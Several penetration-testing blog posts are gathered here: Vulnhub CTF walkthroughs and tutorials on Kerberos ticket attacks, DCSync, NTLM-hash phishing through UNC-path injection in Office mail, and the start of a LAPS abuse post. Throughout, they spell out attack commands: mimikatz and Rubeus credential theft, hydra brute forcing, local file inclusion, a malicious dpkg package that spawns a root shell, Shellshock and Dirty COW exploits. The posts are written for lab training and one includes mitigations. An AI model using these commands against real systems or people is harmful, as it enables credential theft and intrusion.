CTF’s are a great way to sharpen your axe. As a security enthusiast, this is probably the best way to get some hands-on practice that lends perspective as to how an adversary will exploit a vulnerability and how as an infosec professional we will eliminate that risk or guard against it.

This is a very engaging CTF, it has some aspects of steganography. It gives you the chance to turn those wheels but not so much so that you get frustrated, think of it as somewhere between easy and intermediate level. You can download it from here.

Now, let’s dive in.

Penetration Testing Methodology

• Network Discovery and Scanning
  • Using Netdiscover
  • Using Nmap
• Enumeration
  • Directory Bruteforce using dirb
• System Exploration
• Data Exfiltration
  • Using SCP
• Steganography
  • Using Steghide
• Privilege Escalation

Network Scanning

We begin by scanning our network for the target machine using Netdiscover.

The target machine is active on 192.168.1.104. Let’s scan it and see which services are running and which ports are open.

We do an aggressive scan on the target using map.

nmap -p- -A 192.168.1.104

The scan gives us a lot of good and useful information, but what stands out the most is that port 22 and 80 are open, let’s explore port 80 first and see what we can find there.

This does not help much, time to move to the next stage.

Enumeration

Let’s try to bruteforce the directory using dirb and see what we come across. We are using the -X flag to specify that we are looking for .txt formats only.

dirb http://192.168.1.104/ -X .txt

It seems we have found something! Let’s navigate to the link that’s given above in our attacking machines web browser and see what we find.

http://192.168.1.104/notes.txt

The maker of this CTF seems to be hinting that remb.txt and or remb2.txt might hold some valuable information. Let’s navigate to them.

http://192.168.1.104/remb.txt

This looks like a username and a password; I wonder where we will be able to use it?!

System Exploration

We did see that the victim machine has port 22 open, let’s try our luck with SSH, maybe these credentials will work.

ssh first_stage@192.168.1.104
ls
cat user.txt
cd /home
ls
cd mhz_cif
ls
cd Paintings
ls

We were successfully able to connect with the victim machine over SSH using “flagitifyoucan1234” as the password.

Moving around in the directories we find “user.txt” that gives us a clue about the privilege level. Looking further we find a directory named after the CTF machine that holds image files, this is the part where see the potential for steganography.

The images need to be moved from the victim machine to the attacking machine so that they can be investigated further.

Data Exfiltration

There are many ways to exfiltrate data from a system but considering that this is a Linux system, the chances of finding SCP installed on it already are very high, so let’s use that instead of un-necessarily trying to install a new application.

In our attacking machine, we make a directory to call the files to, enter that directory and then start SCP with the credentials that we found earlier. Defining that we want to import all the files in the “Paintings” directory.

mkdir raj
cd raj
scp first_stage@192.168.1.104:/home/mhz_c1f/Paintaings/* .

On checking the contents of the “raj” folder, we see that our operation to exfiltrate data was successful, all the image files in the Paintings directory are now in the attacking machine, ready to be scrutinized.

Steganography

Steghide is the tool of choice here for obvious reasons. We need to find what information is hidden in these images.

steghide extract -sf spinning/ the/ wool.jpeg
cat remb2.txt

On running Steighide, for the image names “spinning the wool.jpeg”, we are prompted for a passphrase, where we use the credentials that we had found earlier. This reveals a text file named “remb2.txt”. If you recall, we have come across this particular file name in our earlier screenshots. 

We open the file to reveal what looks to be more credentials, let’s see where they can be used.

Privilege Escalation

We go back to the terminal we have open into the victim machine and try to switch users to “mhz_c1f” and use the password that we just found, and it works, we are in!

su mhz_cif
id
sudo su
cd /root
ls
ls –la
cat .root.txt

On checking the privilege level held by this account. This account is part of the sudo group, so let’s try to get a better foothold. We are now in the root directory and on checking it’s contents we find “.root.txt” and on opening it, we get our final flag!!

This concludes our walkthrough for mhz_cxf: c1f, we hope you enjoyed it and picked up a few useful pieces of information on the way.

CTF’s are the best way to wrap your head around the concepts and though flows required to be a penetration tester, it gives you a chance to think critically and apply what you have learnt so far about hacking, in a safe environment.

As always, we at hacking articles will try to get you latest and greatest in the sphere of infosec.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

The post mhz_cxf: c1f Vulnhub Walkthrough appeared first on Hacking Articles.

In this post, we’ll discuss how an attacker uses the ccache file to compromise kerberos authentication to access the application server without using a password. This attack is known as Pass the cacche (Ptc).

Table of Content

Credential Cache

Ccache Types

Walkthrough Pass the Ccache attack

• Method 1:Mimikatz
• Method 2: KRB5CCNAME

Credential Cache

A credential cache (or “ccache”) contains the Kerberos credential although it remains valid and, typically, while the user’s session lasts, so that multiple service authentication (e.g. connecting to a web or mail server more than once) does not involve contacting the KDC at every time.

A credential cache usually contains one initial ticket which is obtained using a password or another form of identity verification. If this ticket is a ticket-granting ticket, it can be used to obtain additional credentials without the password. Because the credential cache does not store the password, less long-term damage can be done to the user’s account if the machine is compromised.

A credentials cache stores a default client principal name, set when the cache is created. This is the name shown at the top of the klist

Ccache Types

There are several kinds of credentials cache supported in the MIT Kerberos library. Not all are supported on every platform.

FILE caches: These are the simplest and most portable. A simple flat file format is used to store one credential after another. This is the default ccache type.

API: It is only implemented on Windows. It communicates with a server process that holds the credentials in memory for the user, rather than writing them to disk.

DIR points:  To the storage location of the collection of the credential caches in FILE: format. It is most useful when dealing with multiple Kerberos realms and KDCs.

KEYRING: It is Linux-specific, and uses the kernel keyring support to store credential data in unswappable kernel memory where only the current user should be able to access it.

MEMORY caches: These are for storage of credentials that don’t need to be made available outside of the current process. Memory ccaches are faster than file ccaches and are automatically destroyed when the process exits.

MSLSA: It is a Windows-specific cache type that accesses the Windows credential store.

Read More about  MIT Kerberos Credenial Cache from here: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html

Walkthrough Pass the Ccache attack

Pass the ccache attack uses ticket granting ticket to access the application server without go by kerberos Authentication, here we will try to store Kerb5_tgt in form of ccache and use or pass this ccache file to service application server.

Method 1:Mimikatz

So we have use impacket python script gettgt.py which will use a password, hash or aesKey, it will request a TGT and save it as ccache.

python getTGT.py -dc-ip 192.168.1.105 -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/Administrator

with the help of above command, you will be able to request Kerberos authorized ticket in the form of ccache whereas with the help of the following command you will be able to inject the ticket to access the resource.

Once you have the ccache, use mimikatz to pass the ccache file and try to access the resource, thus you need to execute following commands:

privilege:debug

kerberos::ptc Administrator.ccache
misc::cmd

Note: Here we first generated the ccache and then used mimiktaz, but you can also drag the ccache file from the memory using Klist-c, which will list all the ccache stored in the memory and then use mimikatz to access the resource.

And so a new command prompt will be triggered, which will be the CMD of the requested resource service. You can see how we access the resource without using the password or ticket.kirbi file to access the resource.

push \\ignite.local\c$

Method 2: KRB5CCNAME

Similarly we have use getTGT to to generate the ccache and used KERB5CCNAME pass the ccahe file for the requested service. This is completely remote attack without using local system of compromised victim, but you need to compromise NTLM hashes for that, type following to conduct pass the ccache  attack remotly.

python getTGT.py -dc-ip 192.168.1.105 -hashes :64fbae31cc352fc26af97cbdef151e03 ignite.local/yashika
export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

The post Lateral Movement: Pass the Cache appeared first on Hacking Articles.

In this post we will discuss “How the attacker uses the Microsoft office for phishing attack to get the NTLM hashes from Windows.” Since we all knew that Microsoft Office applications like Word , PowerPoint , Excel and Outlook are the most reliable resource for any organization, and an attacker takes advantage of this reliance to masquerade the user.

Here, we’ve been trying to explain what a different approach an attack uses for a phishing attack to capture Microsoft Windows NTLM hashes.

In actual fact, the attacker tried to use the UNC path injection technique to capture the Windows NTLM hashes and use phishing to achieve his goal.

Table of Content

• Link UNC Path in an Image
• Link UNC PATH in a Text File
• Link UNC PATH Word Document

Walkthrough

Here we are using Kali Linux and its IP is 192.168.1.112, this IP will be used for UNC Path.

Link UNC Path in an Image

Objective 1: send phishing mail to the target user that contains malicious image.

Use office 365 to linking UNC path within an image, for this insert an image and draft a mail for your Victim to masquerade him/her.

Inject the UNC path by adding a hyperlink to the image as shown below. Now-a-day attackers use the COVID-19 precaution images to carry out a large-scale phishing attack.

And we used our Kali Linux IP here to steal the NTLM hashes. This phase could be considered as an easy phase for a threat hunter while hunting for IOC as per pyramid of plain , because here the attacker’s malicious domain address or IP in dword format is used to evade the intruder detection system.

Once you have drafted your message using office 365, install the responder in your Kali Linux which to capture the NTLM hashes.

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Run the given command and just after executing responder send the mail to the victim.

responder -I eth0 -v

Now, when the victim opens the mail and clicks on the image or opens a new tab or saves the image, his/her NTLM hashes have been stolen without his/her knowledge.

As result the attacker will obtain the NTLM hashes of the victim’s machine as shown in the image given below. Here you can observe that it has given NetBIOS username along with hashes.

An attacker may use John’s ripper or other NTLM hashed cracking tools to retrieve a password. As you can see here, we used the above NTLM hashes file generated by the responder to extract Victim’s password with the help of john the ripper.

Link UNC PATH in a Text File

Objective 2: Send phishing mail to the target user that contains Object.

Till Office 2013 it was possible to send a malicious attachment by injecting UNC Path but after Office 2013 the link to the file option is disabled, which prevents an attacker from carrying out a phishing attack via a malicious attachment.

Yet the attacker still figures out about the second alternative to send malicious attachment. Despite sending attachment they try to link object in the mail.

Here we have added a text file as object, here we cannot use “link to file” feature for injecting UNC path.

Once you will add the object, inject the hyperlink for UNC Path as done above, i.e. \\192.168.1.112 and mail to the victim. On other hand use responder, the to steal NLTM hashes as done above.

Now when the victim will opens the mail and clicked on the text or opens in new tab, his/her NTLM hashes has been stolen without his knowledge.

As result the attacker will obtain the NTLM hashes of the victim’s machine as shown in the image given below. Here you can observe that it has given NetBIOS username along with hashes.

Link UNC PATH Word Document

Objective:  Send phishing mail to the target user that contains Word Document Attachment.

In most scenarios, the attacker uses Word Document to make the email appear authentic, so he injects the UNC path inside the document file by hyperlinking the file inside. But as we mention, Outlook removed the option “link to file” or “insert as a link” to prevent attackers from sending malicious documents.

There is an alternative technique that allows an attacker to inject the UNC Path into the attachment. We have written the HTML code in a text file containing the UNC Path link in the src image as shown in the html image.

Now open a Word Document and link the html file as object, thus we move to “insert > Object > Text from file”.

Now insert the HTML file and select the option “insert as Link” as shown the image.

Now use the Word Document that contains a link to the HTML file to be sent as an attachment and sent the mail to the victim, and wait for the victim to respond by putting the responder in the back door.

Now, when the victim opens the mail and clicks on the text or opens a new tab, his / her NTLM hashes have been stolen without his/her knowledge.

As result the attacker will obtain the NTLM hashes of the victim’s machine as shown in the image given below. Here you can observe that it has given NetBIOS username along with hashes.

Conclusion: So we saw how the attacker cleverly injected the UNC path into an image or text file or Word document and masquerade the victim by sending Phishing mail.

The post Abusing Microsoft Outlook 365 to Capture NTLM appeared first on Hacking Articles.

Today we are going to solve another boot2root challenge called “DevRandom CTF:1.1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to Hunri Beats. Let’s start and learn how to successfully breach it.

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link .

Penetration Testing Methodology

Reconnaissance

• netdiscover
• nmap

Enumeration

• Browsing HTTP Service
• Local file inclusion

Exploiting

• Password Bruteforce via hydra
• Login to ssh

Privilege Escalation

• Abusing sudo  dpkg

Walkthrough

Reconnaissance

We will start by scanning the network using Netdiscover tool and identify the host IP address.

We can identify our host IP address as 192.168.1.105. So let’s start with nmap port enumeration and execute following command in our terminal.

 nmap -A -p- 192.168.1.105

From its result, we found ports 22(SSH), 80(HTTP) were open. Also robots.txt is available .

Enumeration

For more detail, we will be needing to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service.

Nothing was displayed on the page . So we started exploring things we found in nmap scan that is:

192.168.1.105/robots.txt
192.168.1.105/?include=info

On seeing the above page i hit-and-trial lfi on it and boom it worked . From its result we found a user trevor .

192.168.1.105/?include=../../../../../../../../../etc/passwd

Exploiting

We have got a username trevor, now our next job is to find the password for the user trevor with the help of hydra, thus we execute following command:

hydra -l trevor -P /usr/share/wordlists/rockyou.txt 192.168.1.105 ssh

From its result , we found the password that is qwertyuiop[]

Since We have username and a password, so we tried to access the SSH on the target system and were successfully able to logged in.

ssh trevor@192.168.1.105

let’s go for post exploitation and try to escalate root privileged. 

sudo -l

with the help of sudo list, we notice that trevor can execute dpkg program as root.

Privilege Escalation

As we know that dpkg is a package installer thus we need to create a malicious package and install the malicious package within the host machine with the help of dpkg as result it will escalate the root privilege.

TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
python -m SimpleHTTPServer

Thus we run the following command found from gtfobin, that creates a malicious package to execute /bin/bash.

Once you will create the package, use python server to transfer this packet into host.

So, I downloaded the above malicious package inside /tmp using wget command.

cd /tmp
wget http://192.168.1.112:8000/x_1.0_all.deb

Now, once I have this package inside the /tmp I can used dpkg with sudo right to install the downloaded package, as soon as it will get install we will the root privilege shell.

sudo dpkg -i x_1.0_all.deb
id
cd /root
ls
cat flag.txt

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact  here

The post DevRandom CTF:1.1 Vulnhub Walkthrough appeared first on Hacking Articles.

The most of the Organisation need more than one domain controller for their Active Directory and to maintain consistency among multiple Domain controller, it is necessary to have the Active Directory objects replicated through those DCs with the help of MS-DRSR refer as Microsoft feature Directory Replication Service (DRS) Remote Protocol that is used to replicate users data from one DC to another. Taking Advantage of this feature the attack abuse the MS-DRSR using Mimikatz-DCSYNC.

Table of Content

• What is DCSYNC Attack
• Walkthorugh
• Mimikatz
• PowerShell Empire
• Metasploit

What is DCSYNC Attack

The Mimikatz DCSYNC-function allows an attacker to replicate Domain Controller (DC) behaviour. Typically impersonates as a domain controller and request other DC’s for user credential data via GetNCChanges.

But compromised account should be a member of administrators, Domain Admin or Enterprise Admin to retrieve account password hashes from the others domain controller. As a result, the intruder will build Kerberos forged tickets using a retrieved hash to obtain any of the Active Directory ‘s resources and this is known as Golden Ticket attack.

Walkthrough on DCSYNC Attack

Mimikatz

So, here we have a normal user account, hence at present User, Yashika is not the member of any privileged account (administrators, Domain Admin or Enterprise Admin).

When the attacker attempts to execute the command MimiKatz-DCSYNC to get user credentials by requesting other domain controllers in the domain, this will cause an error as shown in the image. This is not possible.

So now we have granted Domain Admins right for user Yashika and now yashika has become the member of domain Admin Group which is also AD a privileged group.

We then confirmed this by listing the details of user Yashika ‘s group information and found that she is part of the domain admin group.

Now let ask for a credential for KRBTGT account by executing the following command using mimikatz:

lsadump::dcsync /domain:ignite.local /user:kbrtgt

As a result, it will retrieve the KRBTGT NTLM HASH, this hash further can be used to conduct the very famous GOLDEN Ticket attack, read more about it from here.

Similarly, for every user account in the domain with the same command, we can obtain credentials. Here, it not only requests the current hash but also seeks to get the previous credentials stored.

lsadump::dcsync /domain:ignite.local /user:kavish

PowerShell Empire

If you want to conduct this attack remotely, PowerShell Empire is one of the best tools to conduct DCSYNC attack. Only you need to compromise the machine who is member privilege account (administrators, Domain Admin or Enterprise Admin) as shown here.

Now load the following module that will invoke the mimikatz Powershell script to execute the dcsync attack to obtain the credential by asking from an others domain controller in the domain. Here again, we will request for KRBTGT account Hashes and as result, it will retrieve the KRBTGT NTLM HASH.

usemodule credentials/mimikatz/dcsync_hashdump
set user krbtgt
execute

Likewise, the Empire has a similar module that retrieves the hash of the entire domain controller users account.

usemodule credentials/mimikatz/dcsync_hashdump
execute

Metasploit

If you have meterpreter session of the victim machine who account is member of domain admin, then here also you can execute Mimikatz-DCSYNC attack in order to obtain user’s password.

If your compromised account is a member of the domain admin group, then without wasting time load KIWI and run following command:

dcsync_ntlm krbtgt
dcsync krbtgt

As a result, we found the hashes for krbtgt account and this will help us to conduct Golden Ticket attack for further.

The post Credential Dumping: DCSync Attack appeared first on Hacking Articles.

After working on Pass the Hash attack and Over the pass attack, it’s time to focus on a similar kind of attack called Pass the Ticket attack. It is very effective and it punishes too if ignored. Let’s look into it.

Table of Content

• Introduction
• Configurations used in Practical
• Working
• Pass-the- Hash v/s Pass-the-Ticket
• Pass-the-Ticket Attacks
  • Extracting Tickets: Mimikatz
  • Passing the Ticket: Mimikatz
  • Extracting Tickets: Rubeus
  • Passing the Ticket: Rubeus
• Practical Approach: Golden Ticket Attack
• Detection
• Mitigation

Introduction

The articles series for Lateral Movement which includes techniques below are not the only way to further compromise the target Windows Server. There are other methods as well. One such way was discovered while I was trying to perform the Lateral Movement on the Windows Server from Kali Linux. The surprise was that I didn’t hear about this attack and even the Mimikatz supports it. So, I looked around to find that there is not much written about it. This attack is called Pass the Ticket attack and it can help the attacker to steal the Kerberos Credentials from the Linux system such as Kali Linux and then pass them on Windows Machine while authentication.

Configurations used in Practical

Attacker Machine

• OS: Kali Linux 2020.2
• IP Address: 192.168.1.112

Target Machine

• Server
  • OS: Windows Server 2016
  • IP Address: 192.168.1.105
  • Domain: local
  • User: Administrator
• Client
  • OS: Windows 10
  • IP Address: 192.168.1.106
  • User: Yashika

Working

In this attack, the attacker extracts the Kerberos Ticket Granting Ticket which is also known as TGT. It is located inside the LSASS process in the memory of the system. After extracting the ticket the attacker uses the ticket on another system to gain the access.

Pass-the-Hash v/s Pass-the-Ticket

The major difference between the Pass-the-Ticket and Pass-the-Hash attack is that the time for which the access can be acquired. In simple words, the Kerberos TGT tickets issues have an expiration time of 10 hours (This can be changed). In the case of the Pass-The-Hash, there is no expiration. The attack will work until the user doesn’t change their password.  

Extracting Tickets: Mimikatz

As discussed before the tickets are loaded inside the memory and to extract them we will be using the mimikatz. We run the keberos::list command in mimikatz to read the tickets that are located in the LSASS. To save them on the machine we will use the /export parameter.

kerberos::list
kerberos::list /export

As we can see that we have the tickets that were saved inside the directory where we had the mimikatz executable. In the previous image, we can see that we have 2 tickets and the names of those tickets can be confirmed. For a sense of simplicity, we renamed one of the tickets as ticket.kirbi.

Passing the Ticket: Mimikatz

Now Mimikatz doesn’t just give up after extracting the tickets. It can pass the tickets as well. This is the reason I prefer mimikatz. We go back to the mimikatz terminal. Here, we pass the ticket with the help of ptt module inside the Kerberos module followed by the name of the ticket that we want to pass. This is the reason we renamed the ticket. Now that we have successfully passed the ticket. Now to perform the actions as the user that we passed the ticket for we decided to get a cmd as that user. This can be accomplished using the misc::cmd command as shown in the image given below.

kerberos::ptt ticket.kirbi
misc::cmd

Extracting Tickets: Rubeus

First, we will use extract the tickets using Rubeus. This can be done with the help of the asktgt module. Although it is not so sneaky method it gets the work done. We need the domain name, User, Password Hash. When used normally will give the base64 encoded TGT ticket. But Let’s Pass the Ticket as well in the same step. For this, I will just give the /ptt parameter at the end as shown in the image given below. Rubeus will ask the user for a TGT ticket and after receiving the ticket it encodes the ticket in Base64 and saves the ticket. Since I used the /ptt parameter as well, it will pass the ticket in the current session as well. When the ticket is passed, we can perform the actions as the user we passed the ticket for. Here we take a look at the directories of the said user.

Rubeus.exe asktgt /domain:ignite.local /user:Administrator /rc4: 32196b56ffe6f45e294117b91a83bf38 /ptt
dir \\WIN-S0V7KMTVLD2\c$

Passing the Ticket: Rubeus

If we don’t pass the ticket in the current session then we can use the ptt parameter separately and pass the ticket as the parameter as shown in the image given below. After successfully passing the ticket, we can use the ticket. For this, we decided to get a cmd session of the user we passed the ticket for. We will be using the PsExec64.exe as shown in the image given below.

Rubeus.exe ptt /ticket:ticket.kirbi
PsExec.exe \\192.168.1.105 cmd.exe
ipconfig

Practical Approach: Golden Ticket Attack

Golden Ticket Attack is also a good example of the Pass the Ticket Attack. Let’s take a look at it. Mimikatz allows the attacker to create a forged ticket and simultaneously pass the TGT to KDC service to Get TSG and enable the attacker to connect to Domain Server. This can be done by running both commands on cmd as an administrator.

privilege::debug
kerberos::golden /user:pavan /domain:ignite.local /sid:S-1-5-21-3523557010-2506964455-2614950430 /krbtgt:f3bc61e97fb14d18c42bcbf6c3a9055f /id:500 /ptt
msic::cmd

Above command will generate the ticket for impersonate user with RID 500.

As soon as I ran the above-mentioned commands the attacker gets a new cmd prompt which allows the attacker to connect with Domain Server using PsExec.exe as shown in the below image.

PsExec64.exe \\192.168.1.105 cmd.exe
ipconfig

Detection

• Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
• Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to “Integrity check on decrypted field failed” and indicates misuse by a previously invalidated golden ticket.

Mitigation

• For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it.
• Ensure that local administrator accounts have complex, unique passwords.
• Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.
• Do not allow a user to be a local administrator for multiple systems.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

The post Lateral Movement: Pass the Ticket Attack appeared first on Hacking Articles.

Today, I am going to share a writeup for the boot2root challenge of the Vulnhub machine “Zion: 1.1”. It was actually an intermediate box based on the Linux machine. The goal for this machine is to read the flag.txt file.

Penetration Testing Methodology

• Network Scanning
  • Netdiscover scan
  • Nmap Scan
• Enumeration
  • Enumerating HTTP service on Browser
  • Inspecting the Login Panel using BurpSuite
  • Decoding Base64 and Base62 messages
• Exploitation
  • Crafting the Dictionary using Cewl
  • Bruteforcing using BurpSuite
  • Enumerating the Web Application
• Post Exploitation
  • Connecting using SSH
  • Enumerating for Sudo Rights
• Privilege Escalation
  • Abusing Sudo Rights on cp

Walkthrough

Network Scanning

We begin by scanning our network for the target machine using Netdiscover. The target machine is active on 192.168.1.109. Let’s scan it and see which services are running and which ports are open.

We do an aggressive scan on the target using nmap.

nmap -p- -A 192.168.1.109

Enumeration

The scan gives us a lot of good and useful information, but what stands out the most is that port 22 and 80 are open, let’s explore port 80 first and see what we can find there.

Here we see that we have 2 buttons, The “Truth” and “Illusion”. We are given the choice for the Red Pill and Blue Pill similar situation as Neo faced in the Matrix Trilogy by Morpheus. Clicking on the Truth button, we get to a login page.

After looking around the login panel for some time, I decided to inspect the panel through the BurpSuite. I captured the request in the BurpSuite. Sent the request to the Repeater. Here, upon checking the response of the request, we see that there are some odd parameters containing values that seem to be encrypted.

Guessing that the encryption might be Base64, I decided to decode the banner value using the Decoder. This gave us a message that tells us to “Open our mind”. Also it tells us to avoid some characters.

This means that the message that was left to us is not exactly Base64. If we avoid the characters mentioned in the message we get the encryption that is Base62. So, let’s try to decrypt the message using a Base62 decrypter. You can find one online.

The message that was decoded was that it is giving us the hints for the credentials for the “Zion’s Systems”. It tells us to look at the choice page that we were on few moments before. Also, it gives us the username for the user “morpheus.thematrix”. It also tells us that the user likes to keep simple passwords.

Exploitation

There are multiple methods as to how we can try to get the passwords. We can try manually but when we have an arsenal of tools that can do this for us why waste the time. I decided to create a dictionary that can be used to bruteforce the login using cewl. Using cewl is quite simple, we need to provide the URL and the output file path. Cewl will run and create a dictionary for  all the words that are on the webpage.

cewl http://192.168.1.109/ -w dict.txt

Now for the brute force, we decide to use the BurpSuite’s Intruder Module. To use Intruder, we need capture the request at the “Login” button with some sample text inside the password box.

Now that we have the request, we can use it to brute force the login using the Intruder. I gave the sample text as “test”. We can send the request to Intruder using the shortcut “Ctrl + I”.

After sending the request to Intruder, we go to the Positions Tab. Here we select the Attack type as Sniper. After setting the Attack type we need to specify the Payload Positions. This is the particular text that is going to be brute-forced. Here we want to brute force the password parameter. So we select the “test” as a place holder. Add the “§” symbol around the text as shown in the image given below by clicking the “Add §” button.

Next, we moved onto the Payloads Tab. Here we have multiple sections to provide the type of payload we want to provide for the bruteforce. Payload here means the dictionary that we created using Cewl previously. We need to provide the Simple list in the Payload type option under the Payload Sets section. Next, we need to add the contents of the dictionary we created. For this we will use the Load button in the Payload Options section. This will open up a window where we can browse the dictionary we created. After doing the above steps we click on the Start attack button.

Clicking on the Start attack button opens up a yet other windows where we can see the Burp Suite try multiple requests from the dictionary. We see that we get a redirection from the password interpreted. This could mean that this is the password. Time to check it out.

We go back to the Login Panel, and try the following credentials to login.

Username: morpheus.thematrix
Password: interpreted

This opens up the Zion’s System. Here we see some information about the user w.rabbit . It tells that the user w.rabbit has forgotten his password. So, the Administrator has disabled its logins using the password. But he did something related to the movies. Matrix, I suppose. Also, I see that there is a link for Private key in the top right sections as shown in the image given below.

The link leads us to a page called rabbit-hole/rsa_priv_key_for_w.rabbit.txt. This is a private key for the user w.rabbit. This means we can login into SSH using this user.

Post Exploitation

I copied the contents of the key and saved it into a empty file and save it as “key”. Now, since we have the port 22 open on the Target Machine, we will try to login on SSH using this key.  From some enumeration we find the warning.txt file. Here we see that we have to find the flag in the path mentioned. We are given the freedom to choose any method or technique we want. Enumerating further into the mail directory, I found the credentials for the user w.rabbit. We are already logged in as w.rabbit user but with the password we can run process as user w.rabbit. To find out what services we can run with elevated permissions. We can see that cp command can be run with elevated privileges as user dozer.

ssh -i key w.rabbit@192.168.1.109
cat warning.txt
cat w.rabbit.txt
sudo -l

This means that we can run the cp command without any password or other verification.

Privilege Escalation

In the above step we got the that we can access /bin/cp as sudo for both w.rabbit and dozer and in the process of enumeration we got the sudo password for the w.rabbit. So, let’s try to use the /bin/cp file to escalate to the dozer using /bin/sudo. Using cp i.e copy command we will copy the flag.txt in the tmp folder to display the flag.txt using below command.

/bin/sudo -u dozer /bin/cp --no-preserve=mode,ownership /home/dozer/flag.txt /tmp/flag.txt
cat flag.txt

Here we got our /home/dozer/flag.txt. So that’s for now. See you next time.

Author: Sushma Ahuja is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on LinkedIn

The post Zion: 1.1 Vulnhub Walkthrough appeared first on Hacking Articles.

Today, I am going to share a writeup for the boot2root challenge of the Vulnhub machine “Sumo: 1”. It was an intermediate box based on the Linux machine. The goal for this machine is to read the flag file Download From Here

Penetration Testing Methodology

• Network Scanning
  • Netdiscover scan
  • Nmap Scan
• Enumeration
  • Enumerating HTTP service on Browser
  • Enumerating using Nikto
• Exploitation
  • Exploiting Shellshock Vulnerability
  • Gaining Meterpreter
• Post Exploitation
  • Enumerating for Escalating Privileges
• Privilege Escalation
  • Dirty Cow
• Reading Root Flag

Walkthrough

Network Scanning

We begin by scanning our network for the target machine using Netdiscover. The target machine is active on 192.168.1.104

netdiscover

Let’s scan it and see which services are running and which ports are open.

nmap -p- -A 192.168.1.104

Enumeration

The scan gives us a lot of good and useful information, but what stands out the most is that port 22 and 80 are open, let’s explore port 80 first and see what we can find there.

This webpage seemed like a dead-end so, we decided to perform a Nikto scan in the hope that it will provide us with some more insight.

nikto -h http://192.168.1.104

The Nikto scans the web application to find the /cgi-bin/ directory. on further inspection, the application was found vulnerable to shellshock vulnerability. Time to exploit it.

Exploitation

Open a terminal type msfconsole for loading Metasploit framework and use the following module. This module targets CGI scripts in the Apache webserver by setting the HTTP_USER_AGENT environment variable to a malicious function definition.

use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(apache_mod_cgi_bash_env_exec) >set rhost 192.168.1.104
msf exploit(apache_mod_cgi_bash_env_exec) >set lhost 192.168.1.112
msf exploit(apache_mod_cgi_bash_env_exec) >set targeturi /cgi-bin/test
msf exploit(apache_mod_cgi_bash_env_exec) >expoit

We ran the sysinfo command to find that the Operating System of the Machine is Ubuntu 12.04. Operating Systems this old have a vulnerable kernel. We should try DIRTYCOW.

Privilege Escalation

I downloaded the exploit inside the host machine and then compiled it before running the exploit, so I ran the following commands.

gcc -pthread c0w.c -o c0w

Next, we upload that compiled file in the remote shell for getting into the root.

cd /tmp
upload /root/c0w .
./c0w

The shell that was generated has elevated privileges. To read the Root Flag, we will first convert this shell into a proper shell. Then we used the files created by the Dirty Cow exploit we log in as root. We can see that we have the root flag.

shell
python -c 'import pty; pty.spawn("/bin/sh")
./c0w
/usr/bin/passwd
cd /root
cat root.txt

Here we got our root flag. So that’s for now. See you next time.

Author: Sushma Ahuja is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on LinkedIn

The post Sumo: 1 Vulnhub Walkthrough appeared first on Hacking Articles.

In this post, you will find out how Microsoft’s LAPs feature can be abused by the attacker in order to get the end-user password.

Table of Content

Local Administrator Password Solution

LAPS Attack Walkthrough

• Configuration
• Metasploit
• Empire

The “Local Administrator Password Solution” (LAPS) provides management of local account passwords of domain-joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.

For environments in which users are required to log on to computers without domain credentials, password management can become a complex issue. Such environments greatly increase the risk of a Pass-the-Hash (PtH) credential replay attack. The Local Administrator Password Solution (LAPS) provides a solution to this issue of using a common local account with an identical password on every computer in a domain. LAPS resolves this issue by setting a different, random password for the common local administrator account on every computer in the domain. Domain administrators using the solution can determine which users, such as helpdesk administrators, are authorized to read passwords.

Read more about LAPS Working and its Installation from here.

LAPS Attack Walkthrough

Prerequisites: Download and Install LAPS on Domain Controller and Client machine

Configuration

This attack is being tested on Windows Server 2016 & Windows 10, and you can use the reference link above to configure it. When you install LAPS at some time, you will need to select the feature for the management tool installation.

Choose “Will be installed on the local hard drive” under Management Tools for fat client UI, PowerShell module, GPO editor Templates.

Further, continue with your installation and configuration with the help of an official link and follow the same steps for the Client.

Then we have run following command in PowerShell that will integrate LAPS on our OU “tech”

Import-Module AdmPwd.PS
Update-AdmPwdADSchema
Set-AdmPwdComputerSelfPermission -OrgUnit Tech
Set-AdmPwdReadPasswordPermission -OrgUnit Tech -AllowedPrincipals Administrators

Now set up a group policy on LAPS by navigating to: 

In the GPO, go to Computer Configuration > Policies > Administrative Templates > LAPS Enables the following settings:

• Password Settings
• Name of an administrator account to manage.
• Enable local administrator password management.

Now navigate to Active Directory Users and computers, then select the OU for your LAPs.

NOTE: Enable the Advance feature view as shown in the image.

Now to ensure that it is working fine, let’s check the password given by LAPs to CLIENT1 in its properties.  As you can observe in the given below image the LAPS has assign the random password to client1.

Similarly, with the help LAPS application, we can search for a password for any user’s password, as we have looked for client1’s password.

